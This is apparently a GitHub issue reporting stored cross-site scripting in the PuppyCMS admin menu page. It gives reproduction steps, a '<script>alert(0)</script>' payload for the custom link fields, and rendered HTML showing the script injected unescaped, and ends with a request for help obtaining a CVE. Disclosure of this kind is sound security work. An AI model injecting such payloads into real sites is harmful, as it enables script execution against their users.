Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There have XSS vulnerability that can excute javascript #12

Open
Westbrookadmin opened this issue Aug 7, 2018 · 1 comment
Open

There have XSS vulnerability that can excute javascript #12

Westbrookadmin opened this issue Aug 7, 2018 · 1 comment

Comments

@Westbrookadmin
Copy link

There are 3 XSS vulnerabilities
loading admin/menu.php
sign in and select "SETTINGS",
Insert the payload "'<script>alert(0)</script>" in the add page /URL/ URL / link text and submit.

open menu.php
line 167

<script type="text/javascript">
--
  | $(document).ready(function(){
  | $('[href="menu.php"]').addClass('active');
  | });
  | </script>
  | <div class="main">
  | <div class="main-content">
  | <div class="container-fluid">
  |  
  | <div class="panel panel-headline">
  | <div class="panel-heading">
  | <h3 class="panel-title">Create Menu</h3>
  | <p class="subtitle">Add/Remove/Edit files and folders.</p>
  | </div>
  | <div class="panel-body">
  | <form class="row" method="post" action="" id="menu-form">
  | <textarea name="created-menu-array" id="created-menu-array" class="created-menu-array"></textarea>
  | <div class="col-sm-4">
  | <h3 class="text-center">Add Page/URL</h3>
  | <hr/>
  | <div class="panel panel-primary">
  | <div class="panel-heading">Pages</div>
  | <div class="panel-body">
  | <div class="menu-available-pages" id="menu-available-pages">
  | </div>
  |  
  | <div class="text-right">
  | <button class="btn btn-default" id="menu-select-all">Select All</button>
  | <button class="btn btn-primary" id="menu-add-pages">Add Page(s)</button>
  | </div>
  | </div>
  | </div>
  |  
  | <div class="panel panel-primary">
  | <div class="panel-heading">Custom Link</div>
  | <div class="panel-body">
  | <div class="form-group">
  | <label>URL</label>
  | <input type="text" class="form-control" id="mal-url" name="">
  | </div>
  |  
  | <div class="form-group">
  | <label>Link Text</label>
  | <input type="text" class="form-control" id="mal-text" name="">
  | </div>
  |  
  | <div class="text-right">
  | <button class="btn btn-primary pull-right" id="menu-add-link">Add Link</button>
  | </div>
  | </div>
  | </div>
  | </div>
  |  
  | <div class="col-sm-8">
  | <h3 class="text-center">Menu Structure</h3>
  | <hr/>
  | <div class="dd menu-selected-items" id="menu-selected-items">
  | <ol class="dd-list menu-selected-items-list"><li class="dd-item" data-menu_file="" data-menu_url="/" data-menu_title="Home"><div class="dd-handle">Home<span class="fa fa-close menu_item_remove"></span></div></li><li class="dd-item" data-menu_file="" data-menu_url="<script>alert(0)</script>" data-menu_title="<script>alert(0)</script>"><div class="dd-handle"><script>alert(0)</script><span class="fa fa-close menu_item_remove"></span></div></li></ol>
  | </div>
  | </div>
  |  
  | <div class="form-group text-right">
  | <div class="col-sm-12">
  | <input type="submit" id="menu-submit" name="menu-submit" class="btn btn-success" value="Submit"/>
  | </div>
  | </div>
  | </form>
  | </div>
  | </div>
  | </div>
  | </div>
  | </div>
  | <div class="clearfix"></div>
  | <footer>
  | <div class="container-fluid">
  | <p class="copyright">&copy; 2018 PuppyCMS. All Rights Reserved.</p>
  | </div>
  | </footer>
  | </div>
  | <script src="assets/scripts/puppyadmin.js"></script>
@Westbrookadmin
Copy link
Author

Can you help me to apply for a CVE number? thank you very much indeed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Westbrookadmin